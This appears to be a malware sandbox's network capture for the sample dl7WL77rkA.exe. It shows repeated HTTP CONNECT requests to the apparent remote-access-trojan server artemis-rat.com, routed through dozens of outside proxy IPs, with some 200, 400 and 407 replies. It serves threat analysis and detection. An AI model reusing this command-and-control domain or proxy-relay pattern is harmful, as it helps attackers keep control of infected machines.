                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1004192.168.2.552655195.87.217.7533893876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.696285963 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1005192.168.2.550517212.110.188.220344093876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.700536966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.701920033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.702198982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.702241898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive




                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1012192.168.2.552738146.19.106.217123343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.761535883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1013192.168.2.552693176.213.141.10780803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.765456915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.702142000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.905159950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.886028051 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1014192.168.2.55269861.178.152.3173023876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.766347885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.115189075 CET90INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-Length: 55


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1015192.168.2.552722176.123.56.5836293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.772243023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1016192.168.2.5506348.242.85.69993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.788875103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.811253071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905173063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1017192.168.2.552272162.241.46.40622443876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.792577028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.905029058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905709982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.905189991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1018192.168.2.550569181.114.224.14180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.794290066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.112770081 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1019192.168.2.552737146.56.154.83210003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.802203894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1020192.168.2.55273658.234.116.19781973876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.809463024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1021192.168.2.552597203.95.196.5080803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.810661077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1022192.168.2.552310107.180.89.185490623876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.810667038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.905021906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.905704021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:53.905191898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1023192.168.2.552646102.132.50.680803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.812525034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1024192.168.2.55229751.158.54.6031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.816634893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.996531010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.014666080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.014702082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1025192.168.2.55060051.89.173.40238543876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.828840971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.996701956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1026192.168.2.552739195.248.243.14972373876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.832983971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.498770952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.498742104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.389817953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1027192.168.2.552758172.67.181.11803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.838455915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.993762970 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:41 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1028192.168.2.552750157.185.157.151265893876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:41.842770100 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1029192.168.2.55274598.162.25.4316543876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:41.842770100 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1030192.168.2.55274698.170.57.24941453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:41.855499983 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1031192.168.2.552740125.122.26.24210803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:41.857732058 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1032192.168.2.552792104.19.171.188803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:41.857733011 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.014096975 CET  316  IN  HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:41 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1033192.168.2.552735103.83.232.122803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:41.869061947 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1034192.168.2.552247122.54.147.11080823876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:41.869416952 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:44.996709108 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:48.014667988 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.014703035 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1035192.168.2.552807185.238.228.202803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:41.870381117 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.026665926 CET  316  IN  HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:41 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
1036192.168.2.55277623.231.34.48803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp  Bytes transferred  Direction  Data
Mar 11, 2024 03:30:41.879628897 CET  223  OUT  CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.071126938 CET  401  IN  HTTP/1.0 407 Proxy Authentication Required
Proxy-Authenticate: Basic realm="login"
Connection: close
Content-type: text/html; charset=utf-8
Data Ascii: <html><head><title>407 Proxy Authentication Required</title></head><body><h2>407 Proxy Authentication Required</h2><h3>Access to requested resource disallowed by administrator or you need valid username/password to use this resource</h3></body></html>


